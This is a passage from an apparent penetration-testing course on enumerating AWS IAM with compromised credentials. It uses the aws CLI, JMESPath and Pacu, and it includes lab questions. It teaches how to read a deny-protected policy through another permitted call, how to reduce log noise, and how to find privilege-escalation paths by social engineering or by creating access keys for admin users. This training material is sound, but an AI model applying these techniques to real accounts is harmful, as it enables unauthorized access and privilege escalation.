kali@kali:~$ aws --profile target iam list-policies --scope Local --only-attached | tee policies.json
{
"Policies": [
{
"PolicyName": "manage-credentials",
"PolicyId": "ANPAQOMAIGYU3LK3BHLGL",
"Arn": "arn:aws:iam::123456789012:policy/manage-credentials",
"Path": "/",
"DefaultVersionId": "v1",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"UpdateDate": "2023-10-19T15:45:59+00:00"
},
...
Listing 62 - Listing policies.
Next, to get the inline policies for every identity associated with the compromised credentials, we could run the following subcommands:
- list-user-policies
- get-user-policy
- list-group-policies
- get-group-policy
- list-role-policies
- get-role-policy
Similarly, we can check for all managed policies with the following subcommands:
- list-attached-user-policies
- list-attached-group-policies
- list-attached-role-policies
After that, we'll need to run the get-policy-version subcommand to read the policy document for each of the managed policies we found.
Notice that this manual information-gathering approach can be quite tedious. Automated tools excel at processing all of this information and presenting it in a summarized format.
We could also adopt a simpler approach by running the iam get-account-authorization-details subcommand. This retrieves information about all IAM users, groups, roles, and policies in an AWS account, including their relationships with one another.
Tip
In order to execute get-account-authorization-details, the identity running the command must have the iam:GetAccountAuthorizationDetails permission in its policy. While it's not common to find this permission granted explicitly, it is included whenever a wildcard covers all get permissions (iam:Get*), which is common.
We can filter the results using the --filter argument with a list of space-separated values, which may include User, Role, Group, LocalManagedPolicy, and AWSManagedPolicy. We are not interested in AWS managed policies, so we'll omit that value.
kali@kali:~$ aws --profile target iam get-account-authorization-details --filter User Group LocalManagedPolicy Role | tee account-authorization-details.json
{
"UserDetailList": [
{
"Path": "/admin/",
"UserName": "admin-alice",
"UserId": "AIDAQOMAIGYU3FWX3JOFP",
"Arn": "arn:aws:iam::123456789012:user/admin/admin-alice",
"GroupList": [
"amethyst_admin",
"admin"
],
...
"GroupDetailList": [
{
"Path": "/admin/",
"GroupName": "admin",
"GroupId": "AGPAQOMAIGYUXBR7QGLLN",
"Arn": "arn:aws:iam::123456789012:group/admin/admin",
"GroupPolicyList": [],
...
"RoleDetailList": [
{
"Path": "/",
"RoleName": "aws-controltower-AdministratorExecutionRole",
"RoleId": "AROAQOMAIGYU6PUFJYD7W",
"Arn": "arn:aws:iam::123456789012:role/aws-controltower-AdministratorExecutionRole",
...
"Policies": [
{
"PolicyName": "ruby_admin",
"PolicyId": "ANPAQOMAIGYU3I3WDCID3",
"Arn": "arn:aws:iam::123456789012:policy/ruby/ruby_admin",
"Path": "/ruby/",
...
Listing 63 - Retrieving a snapshot of the IAM configuration with the get-account-authorization-details subcommand
This command returned a great deal of information about the identities and policies in the account. Notably, it's the same information we previously gathered, but obtained through a single request, meaning we generated fewer events in the event history logs. When we build our own tools to query this information, we should start with this command, given its lower profile.
Next, let's check something curious about the authorization details we discovered.
The clouddesk-plove IAM user is associated with a policy that denies access to certain resources. We observed this while scoping the IAM permissions of the compromised user, but we disregarded it at that time. Let's rerun that command and review the list of managed policies associated with this user.
kali@kali:~$ aws --profile target iam list-attached-user-policies --user-name clouddesk-plove
{
"AttachedPolicies": [
{
"PolicyName": "deny_challenges_access",
"PolicyArn": "arn:aws:iam::12345678912:policy/deny_challenges_access"
}
]
}
Listing 64 - Listing the managed policies of the clouddesk-plove IAM user
We identified one managed policy (named deny_challenges_access) associated with the user. To understand the policy's function, we need to read its policy document. Let's take the ARN of this policy and attempt to list its policy versions to gain further insights.
kali@kali:~$ aws --profile target iam list-policy-versions --policy-arn arn:aws:iam::123456789012:policy/deny_challenges_access
An error occurred (AccessDenied) when calling the ListPolicyVersions operation: User: arn:aws:iam::123456789012:user/support/clouddesk-plove is not authorized to perform: iam:ListPolicyVersions on resource: policy arn:aws:iam::123456789012:policy/deny_challenges_access with an explicit deny in an identity-based policy
Listing 65 - Getting an AccessDenied error when trying to list the policy versions of the deny_challenges_access policy
The error message, indicating that the operation was explicitly denied, suggests that the administrator restricted this user's access to certain resources.
This is about to get very interesting. Let's run get-account-authorization-details --filter LocalManagedPolicy to retrieve all the custom managed policies of the account and browse the list until we find the details of the deny_challenges_access policy.
kali@kali:~$ aws --profile target iam get-account-authorization-details --filter LocalManagedPolicy
...
{
"PolicyName": "deny_challenges_access",
"PolicyId": "ANPATV2ULYL4RBGWQT5SE",
"Arn": "arn:aws:iam::253043131129:policy/deny_challenges_access",
"Path": "/",
"DefaultVersionId": "v1",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"CreateDate": "2023-12-11T23:25:03+00:00",
"UpdateDate": "2023-12-11T23:25:03+00:00",
"PolicyVersionList": [
{
"Document": {
"Statement": [
{
"Action": "*",
"Condition": {
"StringEquals": {
"aws:ResourceTag/challenge": "true"
}
},
"Effect": "Deny",
"Resource": "*",
"Sid": "DenyAllIAMActionsOnChallengedResources"
}
],
"Version": "2012-10-17"
},
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2023-12-11T23:25:03+00:00"
}
]
}
]
}
Listing 66 - Getting the list of policy versions from the output of the get-account-authorization-details command
After checking the details in the PolicyVersionList attribute, we realize that we have obtained the previously-denied policy document of the deny_challenges_access policy. The policy denies all actions on any resource tagged with "challenge: true", which is what prevented our user from reading the policy's content directly. However, we managed to view it through the output of another permitted action, effectively circumventing the intended protection.
This was an example of abusing permitted actions to obtain information that is supposed to be denied by IAM policies. In this case, we bypassed the protection using an action from the same IAM service, but the same can happen with actions from other services, for example, listing resources by reading logs in CloudTrail. As defenders, it's important to understand all the actions authorized to each identity and the scope of resources they can access.
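The effect of that Condition block can be modeled in a few lines. This is a simplification covering only the StringEquals-on-tag case from the policy above, not a general IAM policy evaluator:

```python
def denied_by_tag_policy(resource_tags, condition_tag=("challenge", "true")):
    """Mimic the Deny statement: any action on any resource tagged challenge=true."""
    key, value = condition_tag
    return resource_tags.get(key) == value

print(denied_by_tag_policy({"challenge": "true"}))  # True: the explicit deny applies
print(denied_by_tag_policy({"env": "prod"}))        # False: the statement doesn't match
```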
Labs
- Which IAM subcommand retrieves information about IAM entity usage and IAM quotas in the Amazon Web Services account? (Write only the subcommand)
- Which one of the following is not a valid value for the --filter flag of the IAM get-account-authorization-details subcommand? User, Group, Credential, Role, AWSManagedPolicy, LocalManagedPolicy?
- What is the path and name of the group that the IAM user dev-ballen belongs to? (Format: /path/group_name. Example: /amethyst/admin_group)
24.5.3. Processing API Response data with JMESPath
As previously mentioned, we have been using the aws client, which produces JSON output by default. In this section, we will process that JSON output with JMESPath to filter our results.
JMESPath is a query language for JSON, used to extract and transform elements from a JSON document. There's no need to learn the whole language at once; we just need to know that we can use it to build more advanced queries to process the information we gather during the enumeration phase.
In this section, we'll learn some basic querying using JMESPath by running some examples against the output of the iam get-account-authorization-details subcommand.
First, let's use --filter User to show user-related data.
kali@kali:~$ aws --profile target iam get-account-authorization-details --filter User
{
"UserDetailList": [
{
"Path": "/admin/",
"UserName": "admin-alice",
"UserId": "AIDAQOMAIGYUSSOCFCREC",
"Arn": "arn:aws:iam::123456789012:user/admin/admin-alice",
"GroupList": [
"admin"
],
"AttachedManagedPolicies": [],
"Tags": []
},
{
"Path": "/amethyst/",
"UserName": "admin-cbarton",
"UserId": "AIDAQOMAIGYUTHT4D5YLG",
"Arn": "arn:aws:iam::123456789012:user/amethyst/admin-cbarton",
"GroupList": [
"amethyst_admin"
],
"AttachedManagedPolicies": [],
"Tags": []
},
...
Listing 67 - Running get-account-authorization-details subcommand to get all IAM users information
The output shows a JSON document with the UserDetailList element. This is an array of Users objects with some key-value pairs representing properties of the object. For example, the listing above shows the UserName key with its corresponding admin-alice value (both highlighted).
Now, let's query only for the UserName keys for all the objects. This is a perfect opportunity to use a "UserDetailList[].UserName" JMESPath expression. This will retrieve all the objects of the UserDetailList array and output the value of the UserName key. We'll use the --query argument to specify the JMESPath expression.
Tip
The AWS CLI tool allows us to --filter the displayed output. One key difference is that the --filter argument runs on the server side while the --query filtering runs on the client side using JMESPath expressions.
kali@kali:~$ aws --profile target iam get-account-authorization-details --filter User --query "UserDetailList[].UserName"
[
"admin-alice",
"admin-cbarton",
"admin-srogers",
"admin-tstark",
"clouddesk-bob",
...
Listing 68 - Querying the UserName key from the JSON document.
We obtained all the objects but filtered them to display only the value of the UserName key. However, we can select more than one key. Let's query for the UserName, Path, and GroupList keys.
There are two ways to accomplish this. We could use an array like [key1, key2, key3] or an object like {Identifier1: key1, Identifier2: key2, IdentifierN: keyN}, where "Identifier" is simply a name we choose for the key. The Listing below shows both outputs.
We'll use the "UserDetailList[0]" expression to choose only the first object of the array.
kali@kali:~$ aws --profile target iam get-account-authorization-details --filter User --query "UserDetailList[0].[UserName,Path,GroupList]"
[
"admin-alice",
"/admin/",
[
"admin"
]
]
kali@kali:~$ aws --profile target iam get-account-authorization-details --filter User --query "UserDetailList[0].{Name: UserName,Path: Path,Groups: GroupList}"
{
"Name": "admin-alice",
"Path": "/admin/",
"Groups": [
"admin"
]
}
Listing 69 - Querying for more than one key value
Both expressions accomplish the same result, so choosing an approach is just a matter of preference.
In the previous example, we used the expression "UserDetailList[0]" to select only the first object of the array. We can correctly infer that [1] will select the second object, and so on. We can also use the powerful filter projections feature, which allows us to build more advanced queries.
For example, let's list all the IAM Users whose usernames contain the word admin. We would use the UserDetailList[?contains(UserName, 'admin')] expression. Let's run that now.
kali@kali:~$ aws --profile target iam get-account-authorization-details --filter User --query "UserDetailList[?contains(UserName, 'admin')].{Name: UserName}"
[
{
"Name": "admin-alice"
},
{
"Name": "admin-cbarton"
},
{
"Name": "admin-srogers"
},
...
Listing 70 - Filtering all IAM Users whose names contain admin
We received a filtered response with the name of several potentially high-privileged users.
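For comparison, the same filter projection can be reproduced in plain Python against saved output. The jmespath Python package would evaluate the expression verbatim; the sketch below uses only the standard library:

```python
import json

# Inline sample shaped like the get-account-authorization-details output
doc = {"UserDetailList": [
    {"UserName": "admin-alice", "Path": "/admin/"},
    {"UserName": "admin-cbarton", "Path": "/amethyst/"},
    {"UserName": "clouddesk-bob", "Path": "/support/"},
]}

# Equivalent of: UserDetailList[?contains(UserName, 'admin')].{Name: UserName}
names = [{"Name": user["UserName"]}
         for user in doc["UserDetailList"] if "admin" in user["UserName"]]
print(json.dumps(names))
```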
As a final example, we'll build an expression that selects elements from different objects. In this case, let's gather all the names of the IAM Users and Groups which contain "/admin/" in their Path key.
Written separately, the two expressions would be UserDetailList[?Path=='/admin/'].UserName and GroupDetailList[?Path=='/admin/'].GroupName. Let's combine them into a single JSON object with the desired elements, as shown in the Listing below. Notice that we must use the --filter User Group argument to also obtain the Group objects.
kali@kali:~$ aws --profile target iam get-account-authorization-details --filter User Group --query "{Users: UserDetailList[?Path=='/admin/'].UserName, Groups: GroupDetailList[?Path=='/admin/'].{Name: GroupName}}"
{
"Users": [
"admin-alice"
],
"Groups": [
{
"Name": "admin"
}
]
}
Listing 71 - Constructing more advanced queries.
This shows that we can build custom JSON objects by filtering any information we want from the original JSON response.
We can find more examples on this topic on the JMESPath Examples page and in the AWS CLI Filter Output documentation.
In a subsequent section, we'll extract some valuable insights from this environment.
As a final recommendation, we should always try to reduce the number of requests we send by saving all output to a local file and then using an external tool like jp to filter that output with JMESPath expressions.
In summary, the --query parameter is a great AWS CLI feature that leverages JMESPath expressions. Azure CLI also implements a similar feature with JMESPath expressions. Other CSPs like Google Cloud don't implement this directly but they support displaying output in JSON so we can use external tools to process the data.
Labs
- Which argument allows you to filter data on the server side when using AWS CLI?
A) --query
B) --filter
C) --output
D) --select
- What will the JMESPath expression "UserDetailList[].UserName" retrieve?
A) All keys in the UserDetailList
B) Only the first UserName in the UserDetailList
C) All UserName values from the UserDetailList array
D) All users whose username contains "admin"
- What JMESPath expression will filter and display all users that contain the word "admin" in the Username and the Path fields? (Write only the JMESPath expression starting with "?". Use the contains function for both conditions. Example: ?contains(Path,'admin') ... )
24.5.4. Running Automated Enumeration with Pacu
In this section, we'll explore some of Pacu's enumeration modules as a case study in automated AWS enumeration. The goal of automation is not only to streamline our work, but more importantly, to help us better understand the process and even build our own tools and workflows.
Let's start by installing Pacu (if it's not already installed). The package is in the Kali repositories, so we can install it by running sudo apt install pacu in the terminal.
kali@kali:~$ sudo apt update
kali@kali:~$ sudo apt install pacu
Listing 72 - Installing pacu on Kali Linux using the package manager
Next, we'll run pacu without any arguments to start Pacu in interactive mode. Pacu organizes assessments into sessions. The first time we run pacu it will prompt for a session name and create a session.
Let's create a session and name it enumlab.
kali@kali:~$ pacu
....
Database created at /root/.local/share/pacu/sqlite.db
What would you like to name this new session? enumlab
Session enumlab created.
...
Pacu (enumlab:No Keys Set) >
Listing 73 - Starting pacu in interactive mode
Once the session is created, Pacu displays a list of available commands and produces a new command prompt showing that we are in interactive mode inside the enumlab session.
Notice the No Keys Set message shown in the prompt. We can quickly set keys from the AWS CLI credentials file with the import_keys command followed by the name of a profile configured in the AWS CLI. Let's import the target profile.
Pacu (enumlab:No Keys Set) > import_keys target
Imported keys as "imported-target"
Pacu (enumlab:imported-target) >
Listing 43 - Importing the target profile credentials in pacu.
The command prompt now indicates that we are using the keys imported from the target profile.
Before we run any commands, it's important that we monitor the CloudTrail event history using the monitoring user credentials. This helps us study the actions the module executes, further understand what an actual attack might look like, and determine the amount of log noise our actions generate. We can also use this knowledge as a foundation for our own tools. If you have closed the CloudTrail event history window, go ahead and reopen it now before we continue.
We are now ready to explore the enumeration modules. We can use ls to list all available modules.
Pacu (enumlab:imported-target) > ls
...
[Category: ENUM]
enum__secrets
codebuild__enum
ecs__enum
dynamodb__enum
aws__enum_spend
iam__enum_permissions
aws__enum_account
route53__enum
ec2__download_userdata
lightsail__enum
ecs__enum_task_def
ecr__enum
rds__enum
ebs__enum_volumes_snapshots
cloudformation__download_data
inspector__get_reports
guardduty__list_findings
guardduty__list_accounts
iam__detect_honeytokens
iam__bruteforce_permissions
lambda__enum
apigateway__enum
ec2__check_termination_protection
iam__enum_users_roles_policies_groups
ec2__enum
iam__get_credential_report
glue__enum
acm__enum
systemsmanager__download_parameters
...
Listing 74 - Listing all Modules in Pacu
Now let's run help iam__enum_users_roles_policies_groups to learn about this module.
Pacu (enumlab:imported-target) > help iam__enum_users_roles_policies_groups
iam__enum_users_roles_policies_groups written by Spencer Gietzen of Rhino Security Labs.
usage: pacu [--users] [--roles] [--policies] [--groups]
This module requests the info for all users, roles, customer-managed
policies, and groups in the account. If no arguments are supplied, it
will enumerate all four, if any are supplied, it will enumerate those
only.
options:
--users Enumerate info for users in the account
--roles Enumerate info for roles in the account
--policies Enumerate info for policies in the account
--groups Enumerate info for groups in the account
Listing 75 - Getting usage help for a Module in Pacu.
This module works similarly to the get-account-authorization-details subcommand. It returns all the information related to IAM identities and policies. Let's run the module without any arguments so that it will return all info.
Pacu (enumlab:imported-target) > run iam__enum_users_roles_policies_groups
Running module iam__enum_users_roles_policies_groups...
[iam__enum_users_roles_policies_groups] Found 18 users
[iam__enum_users_roles_policies_groups] Found 20 roles
[iam__enum_users_roles_policies_groups] Found 8 policies
[iam__enum_users_roles_policies_groups] Found 8 groups
[iam__enum_users_roles_policies_groups] iam__enum_users_roles_policies_groups completed.
[iam__enum_users_roles_policies_groups] MODULE SUMMARY:
18 Users Enumerated
20 Roles Enumerated
8 Policies Enumerated
8 Groups Enumerated
IAM resources saved in Pacu database.
Listing 76 - Running the iam__enum_users_roles_policies_groups Module in Pacu
The module found resources and, as highlighted above, saved the data in Pacu's database. To display the services for which data has been collected in the current session, we run the services command. We can then run data <service> to display all of the session's data for the specified service. Note that running the data command without any arguments prints all the data stored in the current session.
Pacu (enumlab:imported-target) > services
IAM
Pacu (enumlab:imported-target) > data IAM
{
"Groups": [
{
"Arn": "arn:aws:iam::123456789012:group/admin/admin",
"GroupId": "AGPAQOMAIGYUZQMC6G5NM",
"GroupName": "admin",
"Path": "/admin/"
},
{
"Arn": "arn:aws:iam::123456789012:group/amethyst/amethyst_admin",
"GroupId": "AGPAQOMAIGYUYF3JD3FXV",
"GroupName": "amethyst_admin",
"Path": "/amethyst/"
},
...
Listing 77 - Reviewing the data collected in Pacu
According to the output, Pacu collects the attributes the tool's author considers relevant, which align with those we highlighted earlier: name, ARN, and path.
Tools like Pacu abstract the process of collecting data, eliminating the need to learn specific AWS CLI commands. However, it's important to note that if the compromised credentials belong to an identity without authorization to access this information, no data will be received.
In this section, we presented another way to gather IAM information from a compromised account. In the next section, we'll analyze the data to extract valuable insights.
24.5.5. Extracting Insights from Enumeration Data
After collecting data, the next critical step is to sift through it to extract valuable information and insights. This phase is crucial because raw enumeration data can be lengthy and varied; some of it may be redundant, irrelevant, or benign. Proper analysis helps us identify the critical aspects of the data that can provide meaningful and actionable intelligence.
To identify valuable insights, we need clear objectives and an understanding of what we are trying to achieve. Are we searching for vulnerabilities, business insights, or system inefficiencies? Do we need to escalate privileges to obtain more insights? A clear goal helps us focus on relevant data.
For example, let's assume that after an initial compromise of our lab cloud environment, the attacker's goal is to escalate their current privileges to Administrator access. We won't delve into privilege escalation attacks and exploiting the environment, as that's beyond the scope of this module. Instead, we'll focus on analyzing and discovering potential attack paths.
From the information collected so far while scoping IAM permissions, we learned that with the currently compromised access we can execute many read-only actions but can't change anything in the environment. However, the scope of actions we can execute is wide: we were able to collect the whole IAM configuration and list other resources. This is enough to define some escalation paths toward the goal.
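As a sketch of how this kind of analysis can be automated, the following Python snippet resolves which managed policies each user inherits through group membership from a get-account-authorization-details style document. The function name and the inline sample data are illustrative assumptions modeled on the lab output; the field names follow the AWS CLI's JSON structure.

```python
def inherited_policies(details):
    """Map each user name to the managed policy names it inherits via groups,
    given a parsed get-account-authorization-details document."""
    # Index groups by name so each user's memberships can be resolved.
    groups = {g["GroupName"]: g for g in details.get("GroupDetailList", [])}
    result = {}
    for user in details.get("UserDetailList", []):
        names = []
        for group_name in user.get("GroupList", []):
            for policy in groups.get(group_name, {}).get("AttachedManagedPolicies", []):
                names.append(policy["PolicyName"])
        result[user["UserName"]] = names
    return result

# Minimal, made-up excerpt mirroring the lab's admin-alice configuration:
details = {
    "UserDetailList": [
        {"UserName": "admin-alice", "GroupList": ["admin", "amethyst_admin"]}
    ],
    "GroupDetailList": [
        {"GroupName": "admin",
         "AttachedManagedPolicies": [{"PolicyName": "AdministratorAccess"}]},
        {"GroupName": "amethyst_admin",
         "AttachedManagedPolicies": [{"PolicyName": "amethyst_admin"}]},
    ],
}
print(inherited_policies(details))
# {'admin-alice': ['AdministratorAccess', 'amethyst_admin']}
```

In practice, we could feed this the saved output of the get-account-authorization-details subcommand and immediately see which users reach powerful policies only indirectly, through their groups.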
Let's start with an obvious path. We'll analyze the admin-alice IAM user's data from the output of the get-account-authorization-details IAM subcommand.
kali@kali:~$ aws --profile target iam get-account-authorization-details --filter User Group --query "UserDetailList[?UserName=='admin-alice']"
[
{
"Path": "/admin/",
"UserName": "admin-alice",
"UserId": "AIDAQOMAIGYU3FWX3JOFP",
"Arn": "arn:aws:iam::123456789012:user/admin/admin-alice",
"GroupList": [
"amethyst_admin",
"admin"
],
"AttachedManagedPolicies": [],
"Tags": [
{
"Key": "Project",
"Value": "amethyst"
}
]
}
]
Listing 78 - Getting the "admin-alice" IAM user details
Several details indicate this might be a fully-privileged user. For instance, the username contains "admin", and it's also a member of the admin User Group. There is another indicator that we can identify but we'll leave that as an exercise for later.
Also, notice that this IAM resource has a tag, a custom attribute label that we can assign to identify and organize AWS resources. Administrators often use tags to authorize access and operations. Each tag has two parts: a tag key and an optional field known as a tag value. In this case, the tag has a key set to Project and a value set to amethyst. We should pay attention to tags as they can reveal more about a resource.
Tip
Attribute-Based Access Control (ABAC) is an authorization strategy in which a subject's permission to perform a set of operations is determined by evaluating attributes associated with that subject. Tags are commonly used as attributes to implement ABAC in public cloud environments.
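To make the Tip concrete, here is a minimal, hypothetical sketch of an ABAC-style tag check in Python: access is granted only when the subject's value for a given tag key matches the resource's. The function name and tag data are illustrative assumptions, not part of any AWS API.

```python
def abac_allows(subject_tags, resource_tags, key="Project"):
    """Simplified ABAC check: allow only when both the subject and the
    resource carry the tag key and their values match."""
    return (key in subject_tags
            and key in resource_tags
            and subject_tags[key] == resource_tags[key])

# A principal tagged Project=amethyst may act on amethyst-tagged resources...
print(abac_allows({"Project": "amethyst"}, {"Project": "amethyst"}))  # True
# ...but not on resources from another project, or on untagged ones.
print(abac_allows({"Project": "amethyst"}, {"Project": "ruby"}))      # False
print(abac_allows({"Project": "amethyst"}, {}))                       # False
```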
We also observe that the IAM user doesn't have any associated inline or managed policies, suggesting that the user probably inherits policies from its groups. Let's check the information of the two groups that the user belongs to.
kali@kali:~$ aws --profile target iam get-account-authorization-details --filter User Group --query "GroupDetailList[?GroupName=='admin']"
[
{
"Path": "/admin/",
"GroupName": "admin",
"GroupId": "AGPAQOMAIGYUXBR7QGLLN",
"Arn": "arn:aws:iam::123456789012:group/admin/admin",
"GroupPolicyList": [],
"AttachedManagedPolicies": [
{
"PolicyName": "AdministratorAccess",
"PolicyArn": "arn:aws:iam::aws:policy/AdministratorAccess"
}
]
}
]
kali@kali:~$ aws --profile target iam get-account-authorization-details --filter User Group --query "GroupDetailList[?GroupName=='amethyst_admin']"
[
{
"Path": "/amethyst/",
"GroupName": "amethyst_admin",
"GroupId": "AGPAQOMAIGYUX23CDL3AN",
"Arn": "arn:aws:iam::123456789012:group/amethyst/amethyst_admin",
"GroupPolicyList": [],
"AttachedManagedPolicies": [
{
"PolicyName": "amethyst_admin",
"PolicyArn": "arn:aws:iam::123456789012:policy/amethyst/amethyst_admin"
}
]
}
]
Listing 79 - Getting the "admin" and "amethyst_admin" User Groups details
The AdministratorAccess policy is an AWS managed policy that grants full access to all AWS services and resources. The simplest way to obtain the policy document of any AWS managed policy, including AdministratorAccess, is from the documentation, available on the AdministratorAccess Policy Document page.
From the documentation page, we get the following policy document. Let's analyze it.
{
"Version" : "2012-10-17",
"Statement" : [
{
"Effect" : "Allow",
"Action" : "*",
"Resource" : "*"
}
]
}
Listing 80 - Analyzing the AdministratorAccess Policy Document
Notice that the JSON policy document uses the "*" wildcard in both the Action and Resource elements. This makes the policy maximally permissive, which in turn makes any user in the admin group, such as admin-alice, a prime target for privilege escalation in the environment.
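A quick programmatic way to flag such statements is sketched below. This is an illustrative helper (the function name is our own) that reports Allow statements where both Action and Resource are the bare "*" wildcard, as in the AdministratorAccess document above.

```python
def overly_permissive(statement):
    """Flag Allow statements whose Action and Resource are both the bare
    "*" wildcard, like the AdministratorAccess policy document."""
    def as_list(value):
        # IAM allows these fields to be either a string or a list.
        return value if isinstance(value, list) else [value]
    return (statement.get("Effect") == "Allow"
            and "*" in as_list(statement.get("Action", []))
            and "*" in as_list(statement.get("Resource", [])))

admin_access = {"Effect": "Allow", "Action": "*", "Resource": "*"}
scoped = {"Effect": "Allow", "Action": "s3:*", "Resource": "*"}
print(overly_permissive(admin_access))  # True
print(overly_permissive(scoped))        # False
```

Running a check like this over every policy document collected during enumeration quickly surfaces the identities worth targeting first.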
Let's pause for a moment to analyze the situation. So far we have identified two paths to full-privileged access.
One path might be to find a way to run actions with the admin-alice user's privileges. One external approach might be to social engineer Alice's password for the management console, especially because we previously confirmed that no user has multi-factor authentication configured. Another approach would be to search for other credentials that have permission to modify the admin-alice user's credentials. In this case, we could look for policies that allow the iam:* or iam:CreateAccessKey actions.
A second path would be to obtain credentials for another member of the admin user group, or to find a user that has permission to add users to the admin group. To accomplish this, we could search for policies that allow the iam:* or iam:AddUserToGroup actions.
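That search can be sketched programmatically as below. The helper expands action wildcards such as iam:* with Python's fnmatch and reports which sensitive actions an Allow statement covers. The function name and the SENSITIVE list are our own illustrative assumptions, and real IAM action matching is case-insensitive, which this sketch ignores for simplicity.

```python
import fnmatch

# Actions that enable the two escalation paths described above (assumption:
# this short watchlist is ours, not an official AWS list).
SENSITIVE = ["iam:CreateAccessKey", "iam:AddUserToGroup"]

def grants_sensitive_action(statement):
    """Return the watched actions an Allow statement covers, expanding
    wildcard patterns such as "iam:*" with fnmatch."""
    if statement.get("Effect") != "Allow":
        return []
    actions = statement.get("Action", [])
    if isinstance(actions, str):
        actions = [actions]
    hits = []
    for pattern in actions:
        hits += [a for a in SENSITIVE if fnmatch.fnmatch(a, pattern)]
    return sorted(set(hits))

stmt = {"Effect": "Allow", "Action": "iam:*", "Resource": "*"}
print(grants_sensitive_action(stmt))
# ['iam:AddUserToGroup', 'iam:CreateAccessKey']
```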
To continue the analysis let's display the policies associated with the amethyst_admin user group to learn what actions the admin-alice user inherits from it. We'll continue using the get-account-authorization-details IAM subcommand to get this information.
kali@kali:~$ aws --profile target iam get-account-authorization-details --filter LocalManagedPolicy --query "Policies[?PolicyName=='amethyst_admin']"
[
{
"PolicyName": "amethyst_admin",
"PolicyId": "ANPAQOMAIGYUUA3PZUK57",
"Arn": "arn:aws:iam::123456789012:policy/amethyst/amethyst_admin",
"Path": "/amethyst/",
"DefaultVersionId": "v7",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"PolicyVersionList": [
{
"Document": {
"Statement": [
{
"Action": "iam:*",
"Effect": "Allow",
"Resource": [
"arn:aws:iam::123456789012:user/amethyst/*",
"arn:aws:iam::123456789012:group/amethyst/*",
"arn:aws:iam::123456789012:role/amethyst/*",
"arn:aws:iam::123456789012:policy/amethyst/*"
],
"Sid": "AllowAllIAMActionsInUserPath"
},
{
"Action": "iam:*",
"Condition": {
"StringEquals": {
"aws:ResourceTag/Project": "amethyst"
}
},
"Effect": "Allow",
"Resource": "arn:aws:iam::*:user/*",
"Sid": "AllowAllIAMActionsInGroupMembers"
},
{
"Action": [
"ec2:*",
"lambda:*"
],
"Condition": {
"StringEquals": {
"aws:ResourceTag/Project": "amethyst"
}
},
"Effect": "Allow",
"Resource": "*",
"Sid": "AllowAllActionsInTaggedResources"
},
{
"Action": [
"ec2:*",
"lambda:*"
],
"Condition": {
"StringEquals": {
"aws:RequestTag/Project": "amethyst"
}
},
"Effect": "Allow",
"Resource": "*",
"Sid": "AllowAllActionsInTaggedResources2"
},
{
"Action": "s3:*",
"Effect": "Allow",
"Resource": [
"arn:aws:s3:::amethyst*",
"arn:aws:s3:::amethyst*/*"
],
"Sid": "AllowAllS3ActionsInPath"
}
],
"Version": "2012-10-17"
},
"IsDefaultVersion": true,
},
}
]
Listing 81 - Getting the "amethyst_admin" policy statements
This provides details about the amethyst_admin policy. Let's focus on the PolicyVersionList section which holds the Policy Statements, essentially the permission definitions.
The Policy Document contains a few Statements: AllowAllIAMActionsInUserPath, AllowAllIAMActionsInGroupMembers, AllowAllActionsInTaggedResources, AllowAllActionsInTaggedResources2, and AllowAllS3ActionsInPath. These statements permit actions for IAM as well as other compute and storage services. However, the actions are constrained to resources associated with the amethyst project, either by tag or by path. Even with these constraints, the statements are potentially over-permissive.
Caution
The use of the "*" wildcard in a policy often raises concerns regarding the potential over-permissiveness of that policy.
Let's analyze the AllowAllIAMActionsInGroupMembers statement. It allows any IAM action against any IAM user tagged with the key-value pair "Project:amethyst". The condition is intended to prevent this project's administrators from modifying users belonging to other projects.
For some reason, the highly-privileged admin-alice user is a member of the amethyst_admin group, and the user is also tagged with the project name. The main problem is the tag: because of it, any member of the amethyst_admin group can run dangerous actions, such as creating new access keys (iam:CreateAccessKey) for the admin-alice user, thereby gaining that user's privileges. So, obtaining credentials for the admin-cbarton IAM user could lead to privilege escalation.
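We can model why this works with a simplified evaluator for a single Allow statement: the requested action and resource must match the statement's patterns, and any aws:ResourceTag StringEquals condition must match the resource's tags. This is a sketch under heavy assumptions; it ignores explicit Deny, NotAction, case-insensitivity, and the rest of IAM's real evaluation logic.

```python
import fnmatch

def statement_allows(statement, action, resource_arn, resource_tags):
    """Simplified check of one Allow statement: action and resource must
    match (with wildcards), and any aws:ResourceTag/<key> StringEquals
    condition must match the resource's tags."""
    actions = statement["Action"]
    if isinstance(actions, str):
        actions = [actions]
    if not any(fnmatch.fnmatch(action, p) for p in actions):
        return False
    resources = statement["Resource"]
    if isinstance(resources, str):
        resources = [resources]
    if not any(fnmatch.fnmatch(resource_arn, p) for p in resources):
        return False
    for key, expected in statement.get("Condition", {}).get("StringEquals", {}).items():
        if key.startswith("aws:ResourceTag/"):
            tag_key = key[len("aws:ResourceTag/"):]
            if resource_tags.get(tag_key) != expected:
                return False
    return True

# The AllowAllIAMActionsInGroupMembers statement from Listing 81:
stmt = {
    "Action": "iam:*",
    "Effect": "Allow",
    "Resource": "arn:aws:iam::*:user/*",
    "Condition": {"StringEquals": {"aws:ResourceTag/Project": "amethyst"}},
}

# admin-alice is tagged Project=amethyst, so a member of amethyst_admin
# (such as admin-cbarton) may create access keys for her.
print(statement_allows(
    stmt, "iam:CreateAccessKey",
    "arn:aws:iam::123456789012:user/admin/admin-alice",
    {"Project": "amethyst"}))  # True
```

Had admin-alice carried a different Project tag, or none at all, the condition would fail and the escalation path would be closed.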
The following figure describes a path an attacker may take to escalate the admin-cbarton user to an Effective Admin. This image was created by Awspx, a graph-based tool for visualizing effective access and resource relationships within AWS.
The path reveals that the user admin-cbarton, positioned at the bottom-left, is a member of the amethyst_admin group and thereby inherits the amethyst_admin policy. At the top, we find admin-alice, a member of the admin group, linked to the AdministratorAccess policy, which makes this user an Effective Admin. The path indicates that the admin-cbarton user has permission to impersonate the higher-privileged admin-alice user.
This is an example of extrapolating valuable insights from the enumerated data. We have discovered a new attack path. Although this is not a direct path within our current level of access, identifying these insights can guide our subsequent strategic decisions and actions to accomplish the goal.
In the lab, we can experiment with attack vectors using the challenge IAM user. This user is granted the iam:CreateAccessKey action, enabling it to generate credentials for any other user within the lab environment. For example, we can create access keys for the admin-cbarton IAM user and validate that we can escalate privileges as we learned before.
In this lab, we worked through a simplified environment focusing primarily on IAM resources. But in the real world, sifting through the potentially large volume of enumeration data in search of actionable insights can be highly labor-intensive.
